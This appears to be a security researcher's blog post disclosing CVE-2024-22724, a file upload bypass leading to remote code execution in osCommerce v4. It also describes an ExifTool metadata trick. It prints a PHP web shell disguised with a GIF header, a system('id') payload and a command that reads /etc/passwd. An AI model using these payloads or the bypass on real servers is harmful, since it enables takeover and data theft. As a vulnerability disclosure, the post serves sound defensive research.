OsCommerce v4 RCE: Unveiling the file upload bypass threat

Escrito por  Daniel Barros

 

In my recent research, I identified a critical vulnerability in osCommerce v4, specifically a Remote Code Execution (RCE) vulnerability enabled by bypassing file upload restrictions. I’ve always enjoyed testing file upload bypass techniques in my assessments.

Vulnerabilities Identified in OsCommerce Version 4

The CVE-2024-22724 was assigned to the discovery of this vulnerability.

The issue came to light while modifying the administrator’s profile picture. By altering the file extension from shell.gif to shell.php, as outlined in the request below, the application mistakenly validated the file with the modified extension.

 

I initiated the upload process of a malicious GIF file. This was done by clicking on edit to upload the file.

 

The request was intercepted using Burp Suite, as illustrated in the image below. During this process, I modified the file extension from shell.gif to ‘shell.php’. The content of this file contained the following payload:

GIF89a;
<?
system($_GET[‘cmd’]);
?>

The payload above is a simple yet effective PHP script designed to execute system commands from the GET request’s cmd parameter. The initial GIF89a; serves as a GIF file header, which deceives the server into interpreting this file as a harmless image. This technique represents a classic example of bypassing upload filters by exploiting the server’s file handling logic, thereby enabling the execution of arbitrary commands.

After the upload, I observed that the image appeared successfully loaded, yet the file extension remained shell.gif.

However, upon clicking update and re-examining the request, I discovered that the avatar parameter contained the file shell.gif. I altered this to shell.php, and the upload was successfully executed, and the application accepted the file.

By accessing the ‘shell.php’ file in its directory, I successfully achieved Remote Code Execution (RCE). For instance, executing the command ‘cat /etc/passwd’ demonstrated the capability to execute server commands and potentially access sensitive data.

Unlocking Remote Code Execution (RCE) Magic: Harnessing ExifTool Metadata Trickery

I will share a clever trick for achieving Remote Code Execution (RCE) via ExifTool metadata. This handy method can produce powerful outcomes.

Imagine you have an image file and want to embed PHP code into its metadata using ExifTool.

Let’s say you insert the following code into the comment field:

<?php echo system('id');?>

This code, upon execution, will display the output of the ‘id’ command, providing information about the current user and their privileges.

Once you’ve embedded this PHP code into the metadata of your image file, things start to get interesting. If the application fails to sanitize or filter the metadata of uploaded files adequately, it could inadvertently execute the PHP code embedded in the image’s metadata.

Image successfully loads!

 

Let’s imagine intercepting the request using a tool like Burp Suite. Subsequently, we can scrutinize the response to ascertain whether our PHP code was executed successfully. If it did, we’ll witness the output of the ‘id’ command directly in the response, confirming our achievement of Remote Code Execution.

You now possess a cheeky hack to pull off RCE via ExifTool metadata. Get ready to dance your way through those digital loopholes! Happy hacking, and may your exploits be as sweet as a cupc4k3 emoji 🧁

Autor

Logo da Hakai.